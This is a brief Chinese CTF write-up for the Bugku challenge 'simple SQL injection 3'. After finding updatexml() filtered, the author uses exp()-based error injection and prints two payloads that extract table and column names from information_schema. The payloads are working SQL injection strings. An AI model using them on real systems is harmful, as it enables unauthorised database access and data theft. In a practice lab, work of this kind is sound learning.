bugku -- 简单的sql注入之3
bugku – 简单的sql注入之3
用 1‘试了试,报错,让后1“回显正常。应该是单引号。既然报错,就试了试updatexml()这个函数,但发现被过滤了,所以用exp()这个函数,这里附上一些常见的报错函数:https://www.cnblogs.com/wocalieshenmegui/p/5917967.html
给出payload:
表名:
?id=1' and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))%23
字段名:
?id=1' and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_schema=database())a))%23